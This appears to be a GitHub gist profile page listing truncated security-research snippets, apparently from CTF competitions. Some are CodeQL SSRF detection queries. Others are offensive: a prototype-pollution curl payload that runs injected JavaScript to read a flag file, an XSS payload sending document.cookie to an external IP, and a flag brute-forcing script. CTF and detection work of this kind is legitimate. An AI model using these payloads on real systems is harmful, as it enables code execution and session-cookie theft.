Skip to content

Instantly share code, notes, and snippets.

Avatar

tyage tyage

84 followers · 26 following
View GitHub Profile
@tyage
tyage / autoql.sh
Last active January 12, 2023 08:26
Automatically analyze generated codeql db
View autoql.sh
REPO=$1
REPO_DIR=repos/$REPO/
rm -rf $REPO_DIR
mkdir -p $REPO_DIR
cd $REPO_DIR
git clone --depth 1 "https://github.com/$REPO"
curl "https://api.github.com/repos/$REPO/code-scanning/codeql/databases/javascript" -H "accept: application/zip" -L -o codeqldb.zip
unzip -q codeqldb.zip
codeql database analyze ./javascript codeql/javascript-queries --format=sarif-latest --output=codeql.sarif --download
@tyage
tyage / solve.html
Last active December 12, 2021 05:56
x-note
View solve.html
<script>
chars = '_0123456789abcdefghijklmnopqrstuvwxyz'.split('')
//chars = '_012345678'.split('')
//chars = '9abcdefgh'.split('')
//chars = 'ijklmnopq'.split('')
//chars = 'rstuvwxyz}'.split('')
let prefix = 'SECCON{'
for (let char of chars) {
setTimeout(() => {
let trial = `${prefix}${char}`
@tyage
tyage / fuz-scroll.js
Last active January 9, 2021 05:49
View fuz-scroll.js
// create viewer element
init = () => {
const renderer = document.querySelector('#renderer')
const viewer = document.createElement('div')
viewer.style = `
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
@tyage
tyage / ssrf2.ql
Created October 15, 2020 09:25
View ssrf2.ql
import javascript
import DataFlow
import DataFlow::PathGraph
class SSRFConfiguration extends TaintTracking::Configuration {
SSRFConfiguration() { this = "SSRFConfiguration" }
override predicate isSource(DataFlow::Node source) {
exists(DataFlow::SourceNode req |
isHTTPRequest(req) and
@tyage
tyage / test.ql
Created October 12, 2020 11:47
View test.ql
import javascript
import DataFlow::PathGraph
// TODO: need to add constraint of "@nguniversal/express-engine"
class Configuration extends TaintTracking::Configuration {
Configuration() { this = "Angular SSRF" }
// string not start with https?:// or //
override predicate isSource(DataFlow::Node source) {
source.getStringValue().regexpMatch("^(?!(https?:|//)).*$")
@tyage
tyage / angular-of-universe.md
Last active September 23, 2020 08:28
View angular-of-universe.md

flag 1 (Bypass path restriction with Angular router)

If you can render /debug/answer in server-side, you can get the first flag.

Nginx denies accesses to /debug.

  location /debug {
    # IP address restriction.
 # TODO: add allowed IP addresses here
@tyage
tyage / exploit.sh
Last active August 11, 2020 12:21
View exploit.sh
curl http://10.13.37.$i:14017/config/validated/json-schema/validate -H 'content-type: application/json' --data '{"$schema":{"type":"object","properties":{"__proto__":{"type":"object","properties":{"outputFunctionName":{"type":"string","default":"x;var buf = Buffer.alloc(128);var fs = process.mainModule.require(`fs`);var fd=fs.openSync(`/fl`+`ag`);fs.readSync(fd, buf, 0, 128);fs.closeSync(fd);return buf.toString();//x"},"path":{"type":"string","default":"/foo"}}}}}}'
@tyage
tyage / gist:6cedcff95fa3afcb06963dffef57c542
Created July 12, 2020 08:21
View gist:6cedcff95fa3afcb06963dffef57c542
<script>
setTimeout(() => {
(new Image()).src='/start';
var start = performance.now();
fetch("https://www.materialui.co/materialIcons/navigation/close_black_72x72.png", {
mode: "no-cors",
credentials: "include"
}).then((response) => {
var end = performance.now();
@tyage
tyage / hugo-export-with-wp-syntax.diff
Last active May 4, 2020 15:22
View hugo-export-with-wp-syntax.diff
1a2
>
222,223d222
< do_action('wp_print_scripts');
<
225,228d223
<
< # remove theCode
< $content = preg_replace('/<p class="theCode[^<]+<\/p>/', '', $content);
<
@tyage
tyage / api.sh
Last active April 1, 2020 03:31
View api.sh
#!/usr/local/bin/zsh
command=(
#cookie "PHPSESSID" "rsha06bn3700l9jtvpvsottf7q"
#header "Content*" "compressed"
header "HTTP/ 999 " "found"
#header "HTTP/0.9 " "OK"
#header "Connection" "close"
body "<script\r\n>location.href='//35.209.128.35:12345/?'+document.cookie\r\n</script" b
hello 1 1